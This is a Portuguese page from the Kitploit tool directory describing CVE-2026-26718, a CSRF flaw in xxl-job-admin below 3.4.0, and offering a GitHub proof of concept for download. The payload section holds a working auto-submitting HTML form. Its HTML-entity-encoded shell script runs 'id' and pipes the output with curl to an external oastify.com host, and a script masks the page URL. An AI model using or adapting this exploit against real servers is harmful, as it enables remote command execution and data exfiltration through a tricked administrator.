Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-26718 — Existe uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no aplicativo web xxl-job-admin que permite que um atacante realize modificações não autorizadas nos scripts de shell do Glue IDE. O endpoint afetado não possui validação adequada de token CSRF e aceita métodos HTTP arbitrários por meio de um mapeamento de requisição permissivo. | Kitploit
Ferramentas/GitHubGitHub/ibrahim-sartawi/cve-2026-26718
Análise de VulnerabilidadesExploraçãoEvasão de IDS/IPSExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubibrahim-sartawi/cve-2026-26718

CVE-2026-26718

Ver Repositório
13há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Existe uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no aplicativo web xxl-job-admin que permite que um atacante realize modificações não autorizadas nos scripts de shell do Glue IDE. O endpoint afetado não possui validação adequada de token CSRF e aceita métodos HTTP arbitrários por meio de um mapeamento de requisição permissivo.

Compartilhar

Descrição

Resumo

Existe uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no aplicativo web xxl-job-admin que permite que um atacante realize modificações não autorizadas em scripts de shell do Glue IDE. O endpoint afetado não possui validação adequada de token CSRF e aceita métodos HTTP arbitrários por meio de um mapeamento de requisição permissivo.

Produtos Afetados

root@kitploit:~
xxl-job < 3.4.0

Impacto

Um atacante pode enganar um administrador autenticado para que ele faça alterações não autorizadas em scripts de shell do Glue IDE.

Prova de Conceito

Slide1 Slide2 Slide3 Slide4

Payload

root@kitploit:~

// Decode and change it 

<html>
  <body>
    <form action="https://domain.com/jobcode/save">
      <input type="hidden" name="id" value="294" />
      <input type="hidden" name="glueSource" value="&#35;&#33;&#47;bin&#47;bash&#10;id&#32;&#124;&#32;curl&#32;&#45;d&#32;&#64;&#45;&#32;http&#58;&#47;&#47;qic8br6d6om2j459zk4evuimldr4f03p&#46;oastify&#46;com&#32;&#10;exit&#32;0&#10;" />
      <input type="hidden" name="glueRemark" value="12345" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Créditos a Ibrahim Sartawi

Baixar ferramenta